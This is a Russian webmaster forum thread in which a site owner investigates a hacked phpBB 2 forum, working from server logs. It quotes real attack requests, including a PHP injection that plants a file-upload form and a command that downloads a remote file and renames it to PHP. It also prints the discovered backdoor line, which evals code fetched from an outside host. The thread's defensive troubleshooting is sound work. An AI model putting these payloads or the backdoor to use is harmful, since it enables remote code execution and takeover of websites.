- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Приветcтвую!
Такой лом phpbb 2 форума как лечится?
Смотрю, передача параметров идет через разные файлы
lang_main_attach.php
functions_selects.php,
значит дыра не в этих файлах, а каком то общем модуле. Закачивают exploit.
Кто-нибудь встречал?
Для безопасности быстро вынес эти форумы на отдельный хостинг, пока дыру не прикрою.
Переходить на phpbb 3 не советуйте, надо в этой версии дырку найти.
[28/Jan/2013:18:43:53 +0400] "GET /attach_mod/includes/functions_selects.php?pa=1 HTTP/1.0" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko1/x20100101 Firefox/5.02011-10-16 20:21:42"
[24/Jan/2013:15:53:35 +0300] "GET /profile.php?mode=editprofile&e=print%28$_GET[t]%29;if%28isset%28$_POST[go_up]%29%29{if%28is_uploaded_file%28$_FILES[userfile][tmp_name]%29%29{@copy%28$_FILES[userfile][tmp_name],$_FILES[userfile][name]%29;}};exit;&t=%3Cform%20enctype=multipart/form-data%20method=post%3E%3Cinput%20name=userfile%20type=file%3E%3Cinput%20type=submit%20name=go_up%3E%3C/form%3E HTTP/1.1" 200 114 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0"
А у вы уверены что это уязвимость? Вы ее проверяли, на сайте появлялись посторонние файлы? В багтрекере смотрели по поводу патчей для этой линейки? Это может быть и бэкдор или шелл в скриптах, уж больно параметры не соответствующие
А у вы уверены что это уязвимость? Вы ее проверяли, на сайте появлялись посторонние файлы? В багтрекере смотрели по поводу патчей для этой линейки? Это может быть и бэкдор или шелл в скриптах, уж больно параметры не соответствующие
Да, ехплоит заливаются, активность хацкера по логам видна.
phpbb проапдейчен 2.0.21
Возможно бекдор и залит давно, но чекал последним айболитом.
Мне не понятно, как стало возможно выполнять такие команды:
lang_main_attach.php?pa=sum&co=copy(%22http://expokama.ru/cfg/img/RT/base.txt%22,%22base.txt%22);rename(%22base.txt%22,%20%22base.php%22);
<?php
exec(<?php $GET['co'] ?>);
?>
Как-то так.
Возможно бекдор и залит давно, но чекал последним айболитом.
тогда нужно визуально рассматривать все подключаемые файлы, особое внимание уделяя на зашифрованные участки кода, ну и соответственно тем параметрам по котором обращаются к скрипту. Но уж какие-то они нестандартные, что наталкивает на мысль, что код обрабатывающий их добавленный.
<?php
exec(<?php $GET['co'] ?>);
?>
Как-то так.
Yes! вот она
if(isset($_GET['pa'])){eval ( file_get_contents("htt"."p://expo"."kama."."ru/cfg/img/RT/b.d"));die;}
./attach_mod/includes/functions_selects.php
Для начала обновиться до 3 версии, благо есть автоматические инструменты для данного действия, потом внести фиксы и модули по желанию.
Для безопасности быстро вынес эти форумы на отдельный хостинг, пока дыру не прикрою.
Переходить на phpbb 3 не советуйте, надо в этой версии дырку найти.
Пользоваться старым дырявым софтом не рекомендуют даже разработчики онного. Поэтому другого пути у Вас нет.